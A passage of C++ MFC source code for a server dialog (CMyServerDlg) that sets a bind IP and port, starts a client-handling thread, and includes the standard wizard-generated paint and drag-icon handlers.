			tmp1[pos-tmp1]=0;
		 
			strcpy(ip,tmp1);
		}
	}
//////////////////////////////////////////////////////////////////////////
// 把读取的ip和端口赋值
//////////////////////////////////////////////////////////////////////////
    m_linkinfo.BindPort  = atoi(port) ;
	m_linkinfo.strBindIp = ip;
	
    i=0;
    hThread[i] = CreateThread(NULL,0,MyClientThread,(LPVOID)&m_linkinfo,0,&dw_thread);
	
	return TRUE;  // return TRUE  unless you set the focus to a control
}
// If you add a minimize button to your dialog, you will need the code below
//  to draw the icon.  For MFC applications using the document/view model,
//  this is automatically done for you by the framework.
void CMyServerDlg::OnPaint() 
{
	if (IsIconic())
	{
		CPaintDC dc(this); // device context for painting
		SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);
		// Center icon in client rectangle
		int cxIcon = GetSystemMetrics(SM_CXICON);
		int cyIcon = GetSystemMetrics(SM_CYICON);
		CRect rect;
		GetClientRect(&rect);
		int x = (rect.Width() - cxIcon + 1) / 2;
		int y = (rect.Height() - cyIcon + 1) / 2;
		// Draw the icon
		dc.DrawIcon(x, y, m_hIcon);
	}
	else
	{
		CDialog::OnPaint();
	}
}
// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CMyServerDlg::OnQueryDragIcon()
{
	return (HCURSOR) m_hIcon;
}

						